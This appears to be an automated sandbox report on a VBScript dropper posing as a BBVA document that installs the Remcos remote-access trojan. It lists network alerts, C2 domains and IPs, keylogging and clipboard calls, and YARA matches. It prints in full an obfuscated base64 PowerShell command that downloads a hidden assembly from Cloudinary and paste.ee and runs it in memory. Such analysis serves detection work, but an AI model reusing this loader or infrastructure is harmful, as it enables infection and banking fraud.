Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49795 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49829 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49830 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49784
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49880
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49880
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49880
                        Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443
                        Source: Malware configuration extractorURLs: rem.pushswroller.eu
                        Source: Malware configuration extractorURLs: firewarzone.ydns.eu
                        Source: Malware configuration extractorURLs: sun.drillmmcsnk.eu
                        Source: unknownDNS query: name: paste.ee
                        Source: global trafficTCP traffic: 192.168.2.6:49795 -> 45.80.158.30:23101
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49803 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49784 -> 104.21.84.67:443
                        Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49880 -> 104.21.84.67:443
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004260F7 recv,21_2_004260F7
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /LDDIb HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.rsConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /r/IUrXP/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: paste.rs
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: aspnet_compiler.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: aspnet_compiler.exe, 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: aspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
                        Source: haematachometer.vbs.11.drString found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 0000000E.00000003.2512795164.00000230DF5DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2479709616.00000230DD815000.00000004.00000020.00020000.00000000.sdmp, BBVA S.A..vbs, haematachometer.vbs.11.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000000.00000003.2138819495.0000014C48B91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2480120754.00000230DF561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs_
                        Source: wscript.exe, 00000000.00000003.2172256961.0000014C48C08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138399784.0000014C48BBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138503358.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139016682.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138734913.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176246896.0000014C48C0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2173911891.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139136981.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139348876.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139195389.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172680874.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172776501.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172464026.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172626663.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138837387.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174349568.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139271062.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175798890.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: wscript.exe, 00000000.00000003.2139271062.0000014C48BA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138790827.0000014C48B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScriptf
                        Source: wscript.exe, 00000000.00000002.2177586636.0000014C48D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comL
                        Source: wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comr
                        Source: wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/
                        Source: wscript.exe, 00000000.00000002.2177267353.0000014C48B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174050082.0000014C48B92000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174763206.0000014C46DD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175656148.0000014C48DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177586636.0000014C48D14000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177059176.0000014C46DDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46DCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174920688.0000014C46DD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174829728.0000014C48D12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2177245554.0000014C48B90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2528176368.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525218787.00000230DF845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2517154757.00000230DF580000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2532962670.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2519318326.00000230DF580000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2524709058.00000230DF562000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2532698213.00000230DF560000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2517566946.00000230DF562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIb
                        Source: wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIb8
                        Source: wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176015156.0000014C46D8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2176807263.0000014C46D8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46D64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2523814289.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2526469472.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529538333.00000230DD840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIbs
                        Source: wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.rs/LDDIbt;
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49784 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49790 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49880 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000021_2_004099E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,21_2_00409B10
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR

                        E-Banking Fraud

                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041BB77 SystemParametersInfoW,21_2_0041BB77

                        System Summary

                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,21_2_004158B9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041D07121_2_0041D071
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004520D221_2_004520D2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043D09821_2_0043D098
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043715021_2_00437150
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004361AA21_2_004361AA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0042625421_2_00426254
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043137721_2_00431377
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041E5DF21_2_0041E5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0044C73921_2_0044C739
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_004267CB21_2_004267CB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043C9DD21_2_0043C9DD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00432A4921_2_00432A49
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043CC0C21_2_0043CC0C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00434D2221_2_00434D22
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00426E7321_2_00426E73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00440E2021_2_00440E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043CE3B21_2_0043CE3B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00412F4521_2_00412F45
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00452F0021_2_00452F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00426FAD21_2_00426FAD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004020E7 appears 39 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004338A5 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433FB0 appears 55 times
                        Source: BBVA S.A..vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2510
                        Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
